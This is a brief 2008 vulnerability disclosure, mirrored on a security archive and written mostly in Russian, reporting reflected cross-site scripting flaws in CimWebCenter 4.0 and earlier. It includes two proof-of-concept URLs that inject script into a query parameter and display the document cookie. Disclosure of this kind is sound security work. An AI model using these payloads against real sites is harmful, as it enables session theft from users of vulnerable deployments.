Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20879
HistoryNov 19, 2008 - 12:00 a.m.

Cross-Site Scripting vulnerabilities in CimWebCenter

2008-11-1900:00:00
vulners.com
7

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в системе
CimWebCenter.

XSS:

http://site/forum/?qrstr=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/feeds?qrstr=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уязвимы CimWebCenter 4.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2617/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua